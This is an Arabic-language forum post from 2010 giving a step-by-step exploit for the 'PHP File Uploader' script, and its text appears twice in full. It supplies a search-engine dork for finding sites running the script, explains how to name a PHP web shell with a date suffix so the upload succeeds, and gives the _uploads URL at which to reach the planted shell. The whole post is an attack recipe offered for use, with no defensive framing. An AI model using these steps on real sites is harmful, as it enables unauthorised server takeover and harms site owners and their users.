فهد كوم
09-03-2010, 12:48 PM
PHP file Uploader shell upload Vulnerability
دورك البحث عن المواقع المصابة فى محركات البحث
كود:
Dork : Powered by PHP File Uploader
الأستغلال
ادخل على اى موقع مركب سكربت التحميل هذا
مثل كدا http://server/PHPFileUploader
ونضيف بعد الرابط _uploads
لكى يصبح http://server/PHPFileUploader/_uploads/
قبل رفع الشيل لازم تكتب التاريخ اللى بترفع فيه الشيل
مثلا يكون اسمة ch99.php__2010-01-02_10.00am.php
واربع الشيل وادخل مثل هذا الرابط
http://server/PHPFileUploader/_uploads/ch99.php__2010-01-02_10.00am.php
ستجد الشيل مرفوع
دورك البحث عن المواقع المصابة فى محركات البحث
كود:
Dork : Powered by PHP File Uploader
الأستغلال
ادخل على اى موقع مركب سكربت التحميل هذا
مثل كدا http://server/PHPFileUploader
ونضيف بعد الرابط _uploads
لكى يصبح http://server/PHPFileUploader/_uploads/
قبل رفع الشيل لازم تكتب التاريخ اللى بترفع فيه الشيل
مثلا يكون اسمة ch99.php__2010-01-02_10.00am.php
واربع الشيل وادخل مثل هذا الرابط
http://server/PHPFileUploader/_uploads/ch99.php__2010-01-02_10.00am.php
ستجد الشيل مرفوع